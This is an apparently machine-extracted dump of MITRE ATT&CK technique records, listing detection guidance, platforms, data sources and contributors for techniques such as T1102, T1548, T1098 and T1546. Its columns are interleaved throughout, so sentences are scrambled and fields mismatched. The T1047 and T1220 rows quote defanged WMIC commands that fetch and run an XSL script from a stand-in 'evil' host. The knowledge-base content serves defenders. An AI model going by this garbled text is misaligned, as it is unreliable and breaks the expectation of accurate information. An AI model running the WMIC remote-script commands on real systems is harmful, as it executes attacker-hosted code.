T1600.002attack-pat Weaken Enc Many networkhttps://attack.mitre.org/techniques/T1600/002
devices19such
October21
as routers,
Octoberenterprise-1.0
switches, and firewalls, perform
Defenseencryption
Ev on networ
T1600.001attack-pat Weaken Enc Adversarieshttps://attack.mitre.org/techniques/T1600/001
may modify 19 the
October21
key sizeOctoberenterprise-1.0
used and other encryption parameters
Defense Ev using specialized
T1102 attack-pat Web ServicUse of Webhttps://attack.mitre.org/techniques/T1102
services may
31 May also20protect
07 Octoberenterprise-1.2
back-end C2 infrastructureCommand
from discovery
a through malw
T1102.002attack-pat Web ServicPopular websites
https://attack.mitre.org/techniques/T1102/002
and 14social
March media26 acting
Marchasenterprise-1.0
a mechanism for C2 Command
may give a asignificant amoun
T1102.001attack-pat Web ServicUse of a dead https://attack.mitre.org/techniques/T1102/001
drop resolver
14 March may26 alsoMarch
protectenterprise-1.0
back-end C2 infrastructure
Command from
a discovery throu
T1102.003attack-pat Web Servi Popular websites
https://attack.mitre.org/techniques/T1102/003
and 14social
March media26 acting
Marchasenterprise-1.0
a mechanism for C2 Command
may give a asignificant amoun
T1047 attack-pat Windows M Local File:https://attack.mitre.org/techniques/T1047
***Note:** `wmic.exe`
<code>wmic 31is May 20 15
deprecated
process listOctoberenterprise-1.5
as Execution
of January of 2024, with the
/FORMAT:evil[.]xsl</code> WMIC feature being “disa
T1220 attack-pat XSL Script * Remote File:
https://attack.mitre.org/techniques/T1220
17 October12
<code>wmic Septementerprise-1.2 Defense Ev
os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
detection platformsdata sources
is sub-technique
sub-technique
defenses
of bypassed
contributors
permissions required
supportssystem
remoterequirements
There are many
IaaS, IdentCommand:
ways to perform CUACFALSE bypasses when a user is in the local administrator
Administrator, group
Useron a system, so it may be diffic
Analysts should
Windowsmonitor
Command:
these Registry
C settings
1 T1548 for unauthorized
Windows Us Casey
changes.SmitAdministrator, User
Consider mo macOS Process: OS 1 T1548 Erika Noer Administrator, User
Monitor the Linux, macCommand: C 1 T1548 User
On Linux, aLinux, macCommand: C 1 T1548 User
Defense Evasion, PrivimacOS Command: C 1 T1548 Csaba Fitzl @theevilbit of Kandji; Marina Liang; Wojciech Reg
Defense Evasion, PriviIaaS, IdentUser Accou 1 T1548 Arad Inbar, Fidelis Security
Windows Active
Look for inconsistencies Dir theFALSE
between various fields that Heuristic DJared
store PPID Atki Administrator,
information, such as theUser
EventHeader ProcessId from data
Analysts can Windows Command:
also monitor for useCof Windows
1 T1134APIs suchFileassystemJonny Johnson; Vadim Khrykov
<code>CreateProcessWithTokenW</code> and correlate activity w
Analysts can Windows Command:
also monitor for useCof Windows
1 T1134APIs suchFileassystemJonny JohnAdministrator,
<code>LogonUser</code> User SetThreadToken</code> an
and <code>
Monitor and analyze API
Windows calls to
Process: OS<code>CreateProcess</code>/<code>CreateProcessA</code>,
1 T1134 Heuristic DWayne SilvAdministrator, User specifically those from user/po
Monitor forWindows
WindowsActive
API calls to the <code>DsAddSidHistory</code>
Dire 1 T1134 function.
Alain Home (Citation: Microsoft
Administrator, SYSTEM DsAddSidHistory)
Analysts can also monitor
Windows for useCof Windows
Command: 1 T1134APIs suchFileassystemJonny
<code>DuplicateToken(Ex)</code>,
Johnson <code> ImpersonateLoggedOn
Alerting onIaaS,
[Net](https://attack.mitre.org/software/S0039)
LinuxActive Dire FALSE and these
Arun Event IDs may
Seelagan, CISA;generate a high degree of false positives,
Hubert Mank
Monitor forIaaS,
processes that can beC used
IdentCommand: to enumerate user accounts,
FALSE Danielsuch as <code>net.exe</code>
Stepanic, and <code>net1.exe</co
Elastic; Microsoft Threat Intelligence Center
System
Monitorand network
IaaS,
processes discovery
IdentCommand:
and techniques
command-line 1normally
T1087 foroccur
arguments actionsthroughout
couldanbeoperation
thatPraetorian taken to as an adversary
gather system and learns the environment,
network information. aR
Linux, Win Command: C 1 T1087 ExtraHop; Miriam Wiesner, @miriamxyra, Microsoft Security
Monitor processes
Office Suiand command-line
Command: C arguments
1 T1087 for actions that could be taken to gather system and network information. R
Monitor forLinux,
processes
Win Command:
that can beC used to1enumerate
T1087 user accounts,
DanielsuchStepanic,
as <code>net.exe</code>
Elastic; Miriam Wiesner,
and <code>net1.exe</co
@miriamxyra, Micro
Monitor forContainers,
unusual permissions
Active Dire changesFALSEthat may indicate excessivelyArad Inbar,
broadFidelis
permissions
Security;
being
Janniegranted
Li, Microsoft
to compromised
Threat Intelli
acco
Monitor forIaaS,
use IdentActive
of credentials Dire
at unusual 1times
T1098or to unusual systemsAlex Soler,
or services.
AttackIQ;ThisArad
may Inbar,
also correlate
Fidelis Security;
with otherArun
suspiciou
Seelaga
Collect act IaaS, IdentUser Accou 1 T1098 Alex Parsons, Crowdstrike; Alex Soler, AttackIQ; Arad Inbar, F
Persistence, Privilege ContainersUser Accou 1 T1098
A larger thanOffice
normal
Sui volume
Applicatio of emails sent
1 T1098
from an account and Arad similar
Inbar,
phishing
Fidelis
emails
Security;
sentJannie
from real
Li, Microsoft
accountsThreat
within Intel
a netw
Persistence, Privilege Linux, Win User Accou 1 T1098 Madhukar Raina (Senior Security Researcher - Hack The Box,
Persistence, Privilege Identity P Active Dire 1 T1098 Arad Inbar, Fidelis Security; Arun Seelagan, CISA; Joe Gumke,
For network IaaS, Linu Command:
infrastructure devices,C collect1 AAA
T1098logging to monitor Arad
for Inbar,
rogue Fidelis
SSH keysSecurity; Austin to
being added Clark, @c2defense; Dror A
accounts.
PRE may be focused on FALSE
Detection efforts related stages of the adversary Jeffrey Barto;such
lifecycle, Jeremy Kennelly
as during Initial Access.
PRE mayDomain
Detection efforts be focused Namon FALSE
related stages of the adversary Menachem
lifecycle,Goldstein; Shailesh
such as during Tiwary (Indian
Command Army)
and Control.
Much of thiPRE 1 T1583
Much of thiPRE 1 T1583
Detection efforts
PRE mayDomain be focused Namon related stages of the adversary
1 T1583 lifecycle,
Deloitte such
Threat as during
Library Team; Initial Access and
Menachem Command
Goldstein; andKo
Nikola
Resource DevelopmenPRE Internet S 1 T1583 Hiroki Nagahama, NEC Corporation; Juan Carlos Campuzano -
Much of this PRE activity will take place
Internet S outside the visibility of the target
1 T1583 organization,
Dor Edry, Microsoftmaking detection of this behavior difficult.
Resource DevelopmenPRE Internet S 1 T1583 Awake Security
Much of this PRE activity will take place
Internet S outside the visibility of the target organization, making detection of this behavior difficult.
1 T1583
Much of this PRE activity will take
Internet S place outside the visibility of the target
1 T1583 organization,
Dor Edry, Microsoftmaking detection of this behavior difficult.
Detection efforts
PRE mayNetworkbe focused Traon FALSE
related stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE mayNetworkbe focused Traon related stages of the adversary
1 T1595 Diegolifecycle,
Sappa, such as during Initial Access.
Securonix
Detection efforts
PRE mayNetworkbe focused Traon related
1 T1595
stages of the adversary lifecycle, such as during Initial Access.
Detection efforts
PRE mayNetworkbe focused Traon related
1 T1595
stages of the adversary Elvislifecycle,
Veliz, Citi;
such
JanasPetrov,
duringCiti;
Initial
Richard
Access.
Julian, Citi
Monitor net Linux, Net Application FALSE Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage p
Consider collecting
Linux, Win changes
Network to Tra
ARP caches1 across
T1557 endpoints for signs Jon Sternstein,
of ARP poisoning.
Stern Security
For example, if multiple IP addresses m
Monitor net Linux, Win Application 1 T1557 Alex Spivakovsky, Pentera; Andrew Allen, @whitehat_zero
Collection, CredentialNetwork Network Tra 1 T1557 DeFord L. Smith; Menachem Goldstein
Deploy an LLMNR/NBT-NS
Windows Network spoofing
Tra detection1 T1557
tool.(Citation: GitHubAndrew
Conveigh)
Allen,Monitoring
@whitehat_zero;
of Windows
Eric Kuehn,
event Secure
logs forIdeas;
eventMaID
Analyze netLinux, Net Network Tra FALSE Duane Michael
Monitor forLinux, Net Network
DNS traffic to/fromTra known-bad 1 T1071
or suspicious domains. Chris Heald; Jan Petrov, Citi
Analyze netLinux, Net Network Tra 1 T1071
Analyze netLinux, Net Network Tra 1 T1071
Command and ControLinux, Net Network Tra 1 T1071 Domenico Mazzaferro Palmeri; Sofia Sanchez Margolles
Monitor forLinux, Net Network
web traffic to/fromTra known-bad 1 T1071
or suspicious domains. TruKno
Linux, Win
Monitor processes Command:
and command-line C FALSE
arguments for actions that could be taken to gather system and network information. R
Linux, Win
Consider detecting Command:
writing of filesCo FALSE
with extensions and/or headers associated with compressed or encrypted file types. Detecti
Custom arch Linux, Win File: File C 1 T1560
Consider detecting
Linux, Winwriting of files
File: File C with extensions
1 T1560 and/or headers associated with compressed or encrypted file types. Detecti
Consider detecting
Linux, Winwriting of filesCwith extensions
Command: 1 T1560 and/or headers associated
Mark with compressed
Wee; Mayan or encrypted
Arora aka Mayan Mohan file types. Detecti
Behavior that could
Linux, Winindicate
Command: technique
C FALSEuse include an unknown or unusual process accessing APIs associated with devices or s
DependingIaaS, LinuxCommand: C FALSE Arun Seelagan, CISA; Praetorian Permissions to access directo
Monitor pro Linux, Net Command: Co FALSE ExtraHop
Monitor net IaaS, NetwNetwork Tra 1 T1020
Monitor and analyze network
Windows Command: activity generated by BITS.
C FALSE BITS jobs
Firewall, use Murphy,
HBrent HTTP(S) and SMBDavid
Elastic; for remote
French,connections
Elastic; Redand are tethe
Canary; Rica
Monitor forLinux,
abnormal usage of utilities
Net Command: and command-line parameters involved
Co FALSE in kernel modification
Administrator, root, User or driver installation.
Tools such Windows
as Sysinternals
Command:
Autoruns C may also1 T1547
be used to detect system
Benchercha
changes
Administrator
that could be attempts at persistence, includin
Monitor
On macOS, thWindows
monitor forCommand:
executionCof <code>kextload</code>
1 T1547 commands and Administrator
user installed kernel extensions performing abno
Linux, macCommand: Co 1 T1547 Anastasiosroot
Utilize the Sysinternals
Windows Driver:
Autoruns/Autorunsc
Dri 1 T1547
utility (Citation: TechNet
Vincent
Autoruns)
Le Administrator,
to examineSYSTEM
loaded drivers associated with the
Monitor processes
macOS that File:
start
Fileat login for unusual
1 T1547or unknown applications. Usual User applications for login items could include wh
Monitor Registry
Windowswrites
File:
toFile
<code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>,
1 T1547 Harun Küßne Administrator, SYSTEM paying particular attenti
Monitor forWindows
abnormalDriver:
DLLs thatDri are loaded 1 T1547 Mathieu TaAdministrator,
by spoolsv.exe. Print processors SYSTEMwith known good software o
that do not correlate
MonitoringmacOS Command: C 1 T1547 User
Changes toWindows Command:
these locations C happen
typically 1 T1547
under normal conditions Dray when
Agha,Administrator, User is installed. To increase confid
legitimate software
Monitor thWindows Command: C 1 T1547 Administrator
Monitor forWindows File: Filewith a Zone 1Identifier
LNK files created T1547 value greaterBobby, than 1,FilaAdministrator,
which may indicate User
that the LNK file originated from
Windows
The Sysinternals Command:
Autoruns tool mayC also be 1 T1547 Harun Küßn
used to analyze auto-starting Administrator,
locations, SYSTEM
including DLLs listed as time providers.(Cit
Windowsprocess
Look for abnormal Command: C that may
behavior 1 T1547
be due to a processPraetorianAdministrator,
loading a malicious DLL. SYSTEM
Data and events should not be view
Suspicious Linux
processes or scripts spawned
Command: Co in1 T1547
this manner will have Tony a parent process
Lambe of the desktop component implementing th
root, User
Monitor logLinux, Net Active Dire FALSE
Monitor logmacOS Command: Co 1 T1037
Monitor running
Windowsprocess for actions
Command: C that could
1 T1037be indicative of abnormal programs or executables running upon logon.
Monitor logWindows Active Dire 1 T1037
Monitor forLinux,
<code>/etc/rc.local</code>
Net Command: Co file creation. Although types of RC scripts
1 T1037 root vary for each Unix-like distribution, several
Monitor processes
macOS that are executed
Command: Co during the bootup process to check forAdministrator
1 T1037 unusual or unknown applications and behavior.
On macOS,Linux,
monitor
Winthe commandC line
Command: for usage of the profiles tool,
FALSE Chrissuch
Rossas@xorrior;
<code>profiles install -type=configuration</code>
Justin Warner, ICEBRG; Manikantan Srin
System andLinux,
network
Windiscovery
Command: techniques
C FALSEnormally occur throughout Manikantan
an operation
Srinivasan,
as anNEC
adversary
Corporation
learns India;
the environment.
Mike Kemmer D
This may beWindows Logon Sessi FALSE Justin War Administrator, SYSTEM
Monitor aut Containers,Applicatio FALSE Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend M
Monitor aut Containers,Application 1 T1110 Anastasios Pingios; Diogo Fernandes
It is diffi Identity Pr Application 1 T1110 Mohamed Kmal
Monitor
* Domainaut Containers,A"Audit
Controllers: pplication 1 T1110
Kerberos Authentication Microsoft
Service" (Success Threat Intelligence
& Failure) for event IDCenter
4771. (MSTIC); Mohamed Kma
* All systems:
Containers,
"Audit Logon"
Application
(Success & Failure)
1 T1110 for event ID 4648. John Strand; Microsoft Threat Intelligence Center (MSTIC)
Monitor foContainersImage: Imag FALSE Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security; M
Access to tLinux, Win Command: C FALSE
IaaS Command: C FALSE Adrien Bataille; Ander FALSE
Establish c IaaS Cloud Stor FALSE Isif Ibrahima, Mandiant; Praetorian; Regina Elwell
Monitor acc IaaS, IdentLogon Sess FALSE Obsidian Security; Praetorian
Normal,
System and IaaS,
benign IdentCloud
system
network and Servi
network
discovery FALSE
eventsnormally
techniques that lookoccur
like cloud Arun Seelagan,
service
throughout discovery
an operationCISA;
mayas Praetorian;
be
an uncommon,
adversary Suzy Schapperle
depending
learns on- Microsoft
the enviro
the environment. D
Monitor cloudIaaSlogs forCloud Storused FALSE
API calls for file or object enumeration Isiffor
Ibrahima,
unusualMandiant;
activity. Regina Elwell
Scripts are IaaS,
likelyIdentCommand:
to perform actions C with
FALSEvarious effects on a system that may generate events, TRUEdepending on the types of mo
UnderstandingmacOS Command:
standard C
usage patterns is1important
T1059 to avoid a high Philnumber
Stokes, Sentinel FALSE
of false positives. If scripting is restricted for norm
Windows Command: C 1 T1059 @_montysecurity; Lira FALSE
IaaS, IdentCommand: 1 T1059 Caio Silva; Jason Sevi FALSE
UnderstandingLinux,standard usage patterns
Win Command: C is1important
T1059 to avoid a high Cody number
Thomas,of Specte
false positives. If scripting is restricted for norm
FALSE
Linux, Net Command: C 1 T1059 FALSE
Consider comparing
Network aCommand:
copy of the network1 device
T1059 configuration against a known-good version to discover unauthorized chang
TRUE
Consider monitoring
Windows for WindowsCevent ID
Command: (EID) 400, which shows
1 T1059 the version
Mayuresh Dani,of Qualys
PowerShell executing in the <code>EngineVe
TRUE
Scripts are Linux,
likely to perform
Win Command: actions
C with various
1 T1059effects on a system that may generate events, 0depending Python is on the types of mo
installed.
Scripts are Linux,
likely to perform
Net Command: actions
C with various
1 T1059effects on a system that may generate events, TRUEdepending on the types of mo
UnderstandingLinux,standard
Win Command:
usage patterns
C is1important
T1059 to avoid a high number of false positives. FALSE
If VB execution is restricted for
Scripts are Windows
likely to perform
Command: actions
C with various
1 T1059effects on a system that may generate events, TRUEdepending on the types of mo
Monitor fi Linux, Win Drive: Driv FALSE
Much of this PREactivity will
Network
take place
Tra outside
FALSE the visibility of the target organization, making detection of this behavior difficult.
Much of thiPRE 1 T1586 Francesco Bigarella
Much of thiPRE 1 T1586 Bryan Onel; Tristan Bennett, Seamless Intelligence
PRE mayNetwork
Detection efforts be focused Traon related
1 T1586
stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing
Linux, Winfor
Consider monitoring File:anomalous
File C FALSE from client applications,
behavior CrowdStrike
such asFalcon
atypicalOverWatch; Jamie
module loads, fileWilliams (U ω U),
reads/writes, or PANW
netw
PRE mayDomain
Detection efforts be focusedNamon FALSE
related stages of the adversary Jeremy Galloway;
lifecycle, such Menachem Goldstein;
as during Command Shailesh
and Control.Tiwary (Indi
Much of thiPRE 1 T1584
Much of this PRE Domain
activity will Nam outside
take place 1 T1584 Jeremy
the visibility of the target Galloway making detection of this behavior difficult.
organization,
Much of this PRE Domain
activity will Nam outside
take place 1 T1584 Jeremy
the visibility of the target Galloway making detection of this behavior difficult.
organization,
Resource DevelopmenPRE Internet S 1 T1584 Gavin Knapp
Much of this PREactivity will take place
Internet S outside the visibility of the target
1 T1584 organization,
Dor Edry, Microsoftmaking detection of this behavior difficult.
Resource DevelopmenPRE Internet S 1 T1584 Awake Security
Much of this PREactivity will take place
Internet S outside the visibility of the target organization, making detection of this behavior difficult.
1 T1584
Much of this PREactivity will take place
Internet S outside the visibility of the target
1 T1584 organization,
Dor Edry, Microsoftmaking detection of this behavior difficult.
Container aContainersCommand: C FALSE Alfredo Oliveira, Tr TRUE
Monitor logs for actions that
ContainersContainer: could be taken
FALSE to gather information about container infrastructure,
Center for Threat-Informed Defense including
(CTID);the use ofManral,
Vishwas discove
Command and Control, Linux, Win File: File FALSE
Collect usage logs from
Containers, cloud administrator
Command: C FALSE accounts to identify unusual activity
Austin Clark, in the creation
@c2defense; of newThreat
Microsoft accounts and assignme
Intelligence Cent
Collect usaIaaS, IdentUser Accou 1 T1136 Arun Seelagan, CISA; Microsoft Threat Intelligence Center (M
Monitor foLinux, Win Command: C 1 T1136
Monitor forContainersCommand: C 1 T1136 Austin Clark, @c2defense
Monitor forContainersCommand:
changes to files associated
Co FALSE
with system-level processes.
Persistence, Privilege ContainersCommand: C 1 T1543
Ensure Launch
macOS Agent'sCommand:
<code> ProgramArguments
Co 1 T1543 </code> key pointing
Antonio to Pi Administrator,
executables located
User in the <code>/tmp</code> or
macOS Command: Co 1 T1543 Administrator
Auditing the
Linux
executionCommand:
and command-line
Co 1arguments
T1543 of the `systemctl`
Emad Al-Mo
utility,
root,
asUser
well related utilities such as `/usr/sbin/servic
Suspicious Windows Command:
program execution Co services
through 1 T1543 Akshatprocesses
may show up as outlier Pradhan, Qualys;
that haveMatthew
not beenDemaske, Adaptfor
seen before when comp
Monitor sysIaaS, Linu Cloud Servi FALSE
Credential Access IaaS Cloud Serv 1 T1555 Martin McCloskey, Datadog
Identify weLinux, Win Command: C 1 T1555 Barry Shteiman, Exabeam; RedHuntLabs, @redhuntlabs; Ryan
Unlocking tmacOS Command: C 1 T1555
Linux, Winfile
Consider monitoring Command: C
reads surrounding 1 T1555
known password manager Matt Burrough,
applications.@mattburrough, Microsoft
Monitor prLinux, macCommand: C 1 T1555
Windows file
Consider monitoring Command:
reads to CVault locations,
1 T1555 <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vau
Bernaldo Penas Antelo; Mugdha Peter Bansode; Uriel Kosaye
In cloud environments,
ContainersCloudthe occurrence
Stora FALSE of anomalous high-volume deletion
Brent events,
Murphy, suchDavid
Elastic; as theFrench,
<code>DeleteDBCluster</code
Elas
IaaS Cloud Stor 1 T1485
Analyze netLinux, Win Network Tra FALSE Itzik Kotler, SafeBreach
Analyze netLinux, Win Network Tra 1 T1132 User
Analyze netLinux, Win Network Tra 1 T1132
In cloud environments, monitor
IaaS, Linu Cloud Storafor events
FALSE that indicate storage objects
ExtraHop;have been anomalously
Harshal Tupsamudre,replaced by copies.
Qualys; Mayu
Where appliLinux, Win File: File FALSE
Inspect impLinux, Win File: File C 1 T1565
Where appliLinux, Win File: File C 1 T1565
Detecting tLinux, Win Network Tra 1 T1565
Analyze netLinux, Win Network Tra FALSE
Analyze netLinux, Win Network Tra 1 T1001
Analyze netLinux, Win Network Tra 1 T1001 James Emery-Callcott, Emerging Threats Team, Proofpoint
Analyze netLinux, Win Network Tra 1 T1001
IaaS, Linu accesses
Consider monitoring Command: andC modifications
FALSE Praetorian;
to storage repositories (suchShane
as theTully, @securitygypsy
Windows Registry), especially from suspic
Linux, Winaccesses
Consider monitoring Command: andC modifications
1 T1074to local storage repositories
Massimiliano(such Romano,
as theBTWindows
Security Registry), especially from s
IaaS, Linuand
Monitor processes Command: Co arguments
command-line 1 T1074 for actions thatPraetorian
could be taken to collect and combine files. Remote access t
Analyze netLinux, Win Network Tra FALSE
Monitor forIaaS, Offic Cloud Servi FALSE AppOmni; Arun Seelagan, CISA; Netskope; Praetorian
Identify neNetwork Network Tra FALSE
Identify neNetwork Network Tra 1 T1602 Administrator
Identify neNetwork Network Tra 1 T1602 Administrator
The user access logging within
IaaS, LinuxApplication Microsoft's
FALSE SharePoint can be configured to report access to
Isif Ibrahima, Mandiant; certain
Milos pages andNaveen
Stojadinovic; documents. (Cit
Vijayarag
Monitor accSaaS Application 1 T1213 Itamar Mizrahi, Cymptom; Josh Liburdi, @jshlbrd; Toby Kohle
User accessSaaS
logging within Atlassian's Confluence
Application 1 T1213 can be configured to report access to certain pages and documents through
SaaS Application 1 T1213 Centre for Cybersecurity Belgium (CCB)
Office Suit Application 1 T1213 Menachem Goldstein; Obsidian Security
Office Sui Application 1 T1213 Arun Seelagan, CISA
For network infrastructure
Linux, devices,
Net Command: Co collect
FALSE AAA logging to monitor `show`
Austin commands
Clark, that view
@c2defense; Williconfiguration
Privileges to files.
access certain fi
Monitor prLinux, Win Command: C FALSE David Tayouri Privileges to access network
Monitor prLinux, Win Command: C FALSE William Cain Privileges to access removab
Monitor debugger
Linux, Winlogs
Applicatio
for signs of abnormal
FALSE and potentially maliciousTruKnoactivity.
IaaS, Linu Application FALSE
Monitor extIaaS, Linu Application 1 T1491
Monitor intLinux, Win Application 1 T1491
Monitor the Linux,
execution
Win File:
fileFile
paths and FALSE
command-line arguments
Anti-virus,for
Matthew
common Demaske,
archive file
Adaptforward;
applicationsRed
andCanary
extensions, such as th
Monitor forContainersApplication FALSE Alfredo Oliveira, Tr TRUE
Much of thisPRE Internet
activity will S
take place FALSE the visibility of the target organization, making detection of this behavior difficult.
outside
Much of thisPRE Malware
activity will Re outside
take place 1 T1587
the visibility of the target organization, making detection of this behavior difficult.
PRE mayInternet
Detection efforts be focusedS on related 1 T1587
behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/0
Much of thiPRE 1 T1587
Much of thisPRE Malware
activity will Re outside
take place 1 T1587
the visibility of the target organization, making detection of this behavior difficult.
Linux, Win Command: C FALSE ESET
Network,and
Monitor processes Command:
command-lineC FALSE File monito
arguments for actions thatTom Simpson,
could be takenCrowdStrike
to copy filesFalcon OverWatch
from the logical drive and evade
Look for atLinux, Net Command: Co FALSE Austin Clark, @c2defense
For network infrastructure
Linux, Net Command:devices,Co collect1 AAA
T1561 logging to monitor for èrase` commands that delete critical configuration files
For network
Monitor infrastructure
Linux,
processes Net devices,
Command:
and command-lineCo collect
1 AAA
T1561
arguments logging to monitor
for actions for `format`
thatAustin
could Clark, commands
to gather being
@c2defense
be taken systemrunandtonetwork
erase theinformation,
file structure
s
Windows Command: Co FALSE Dave Westgard; Elia Florio, Microsoft; ExtraHop; Mnemonic; R
Consider monitoring
Identity P for commands/cmdlets
Active Dire FALSE and command-line argumentsSeAdministrator,
File systemObsidian that may be leveraged
User to modify domain policy se
GPO abuseWindows
will often be accompanied
Active Dire by 1some
T1484other behavior such as [Scheduled
Itamar Task/Job](https://attack.mitre.org/techniqu
MizrAdministrator, User
Monitor forIdentity
PowerShell commands
P Active Dire such as: <code>Update-MSOLFederatedDomain
1 T1484 Blake Strom –DomainName: "Federated Domain Name
Administrator
Detecting compromise based on the FALSE
Identity P Application drive-by exploit from a legitimate website Microsoft
Jeff Sakowicz, may be difficult.
IdentityAlso look forPlatform
Developer behaviorServices
on the e
Detecting dLinux, Win Network Tra FALSE Chris RoffeUser
Detection fLinux, Win Network Tra 1 T1568
Machine learning
Linux, Win
approaches
Networkto Tradetecting1 DGA
T1568 domains have been Barry
developed
Shteiman, and
Exabeam;
have seen Ryan
success
Benson,
in applications.
Exabeam; Sylvain
One app
Gi
In general,Linux, Win Network Tra 1 T1568
Auto-forwarded
Linux,messages
Off Applicatio
generally contain
FALSE specific detectable artifacts
Menachem thatGoldstein;
may be present
SwethainPrabakaran,
the header; Microsoft
such artifacts
Threat
wouI
Auto-forwarded
Linux,messages
Off Applicatio
generally contain1 T1114
specific detectable artifacts
Arun Seelagan,
that mayCISA;
be present
Liran Ravich,
in theCardinalOps;
header; suchMicrosoft
artifacts wou
Sec
Monitor prWindows Command: C 1 T1114 User
Monitor forOffice Sui Applicatio 1 T1114 Arun Seelagan, CISA
In general, Linux, Net
analyze Network
network Trafor uncommon
data FALSE data flows (e.g., a client sending significantly more data than it receives from
In general, Linux, Net
analyze Network
network Trafor uncommon
data 1 T1573data flows (e.g., a client sending significantly more data than it receives from
In general, Linux, Net
analyze Network
network Trafor uncommon
data 1 T1573data flows (e.g., a client sending significantly more data than it receives from
ContainersApplication
Externally monitor the availability of FALSE
services that may be targeted Alfredo
by anOliveira,
EndpointTrend
DoS. Micro; David Fis
In additionIaaS, Linu Application
to network 1 T1499 logging and instrumentation can be useful for detection. Attacks targeting w
level detections, endpoint
Attacks tarIaaS, Linu Application 1 T1499
Detection oLinux, Win Network Tra 1 T1499
Externally monitor the availability
IaaS, Linu Application of services that may be targeted by an Endpoint DoS.
1 T1499
Monitor forContainersContainer: FALSE Alfredo Ol Administrator, root, User
Much of thisPREactivity will take place
Network Tra outside
FALSE the visibility of the target organization, making detection of this behavior difficult.
Much of thiPRE 1 T1585 Francesco Bigarella
Much of thiPRE 1 T1585
Detection efforts
PRE mayNetwork
be focused Traon related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing
1 T1585
Monitor DLL loads
IaaS, by processes,
LinuxCloud Servispecifically
FALSE looking for DLLs that are not recognized or not normally loaded into a process. Loo
Changes toWindows Command: Co 1 T1546 Paul Speul Administrator
Look for abnormal
Windowsprocess
Command:
behaviorC that may
1 T1546be due to a process loading a Administrator,
malicious DLL. SYSTEM
Data and events should not be view
Look for abnormal
Windowsprocess
Command:
behaviorC that may
1 T1546be due to a process loading a Administrator
malicious DLL. Data and Secure
events
boot
should
disabled
not be view
Monitor process
Windowsexecution
Command:for sdbinst.exe
C 1 and
T1546command-line arguments forAdministrator
potential indications of application shim abuse.
Also look for
Windows
abnormalCommand:
process callC trees for
1 T1546
execution of other commands
Stefan Kantthat
Administrator,
could relate SYSTEM,
to Discovery
User actions or other tech
Likewise, ifWindows
software DLL
Command:
loads areC collected
1 T1546
and analyzed, any unusual
Elastic DLL load
User that can be correlated with a COM object Reg
Monitor emmacOS Command: Co 1 T1546 Ivan Sinya Administrator
Monitor Registry
Windowsvalues
Command:
associatedC with IFEOs,
1 T1546 as well as silent process
OddvarexitMoAdministrator,
monitoring, forSYSTEM
modifications that do not correlate
Persistence, Privilege Linux, Win Command: C 1 T1546 Brandon DaUser
Monitor pro macOS Command: C 1 T1546 User
It is likel Windows Command: C 1 T1546 Matthew DAdministrator, SYSTEM
WindowsPowerShell
Monitor abnormal Command: Co
commands, 1 unusual
T1546 loading of PowerShell
Allen DeRyAdministrator,
drives or modules,User
and/or execution of unknown pro
Tools such Windows Command:
as Sysinternals Co can be
Autoruns 1 T1546
used to detect changes Bartosz
to theJescreensaver
User binary path in the Registry. Suspicious p
Trap comman Linux, macCommand: Co 1 T1546 Administrator, User
Monitor
For mostfilLinux File: File
Linux and macOS systems, a list 1ofT1546 @grahamhelton3;
file paths for valid shell options availableEder
on aPérez Ignacio,
system @ch4ik0;
are located Eduardo
in the Gon
<code>/et
Linux, macCommand: Co 1 T1546 Robert WilAdministrator, User
Monitor processes
Windowsand command-line
Command: C arguments
1 T1546 that can be used to register
Brent Murph WMI persistence,
Administrator, SYSTEM such as the <code> Register-W
Detecting tLinux, Win Command: C FALSE Anti-virus, Nick Carr, Mandiant
Detecting tLinux, Win Command: C 1 T1480 Anti-virus, Nick Carr, Mandiant
Defense Evasion Linux, Win File: File 1 T1480 Manikantan Srinivasan, NEC Corporation India; Nagahama Hir
Analyze netIaaS, LinuxApplication FALSE Alfredo Abarca; William Cain
Analyze netLinux, Win Command: Co 1 T1048 William Cain
Artifacts and evidence
Linux, of symmetric
Win Command: Co key exchange
1 T1048 may be recoverable by analyzing network traffic or looking for hard-coded v
For network infrastructure
Linux, Net Command: devices,
Co collect1 AAA
T1048 logging to monitor for `copy`
Austin Clark,commands
@c2defense; being run to
William exfiltrate configuration fi
Cain
Analyze netLinux, Win Command: Co FALSE William Cain
Monitor forLinux,
and investigate
Win Command: changes
Co FALSE
to host adapter settings, such Itzik
as Kotler,
additionSafeBreach
and/or replication of communication interfaces
Monitor forLinux,
and investigate
Win Command: changes
Co to host1 T1011
adapter settings, such as addition and/or replication of communication interfaces
Monitor fi Linux, Win Command: Co FALSE William Cain Presence of physical medium
Monitor fi Linux, Win Command: Co 1 T1052 William Cain Presence of physical medium
Analyze netLinux, Off Application FALSE William Cain
Exfiltration Linux, Off Application 1 T1567 Sunders Bruskin, Microsoft Threat Intelligence; Yossi Weizma
Analyze netLinux, Win Command: Co 1 T1567
Analyze netLinux, Win Command: Co 1 T1567
Exfiltration Linux, Win Network Tra 1 T1567 Harun Küßner
Monitor app ContainersApplication FALSE Praetorian; Yossi Weizman, Azure Defender Research Team
Detecting sLinux, Win Application FALSE 0 Remote exploitation for exec
Detecting sIdentity P Application FALSE John Lambert, Microsoft Threat Intelligence Center; Mohit Ra
ExploitatioIaaS, Linu Application FALSE Anti-virus, John Lambert, Microsoft Threat Intelligence Center
Higher privileges are often necessary
ContainersDriver: Dri to perform
FALSE additional actions suchTayoUser
David as some methods of [OS Credential Dumping](https://
Detecting sLinux, Win Application FALSE ExtraHop User Unpatched software or other
When authentication is not required FALSE
ContainersApplication to access an exposed remote service,
Alfredo monitor
Oliveira, for follow-on
Trend activities
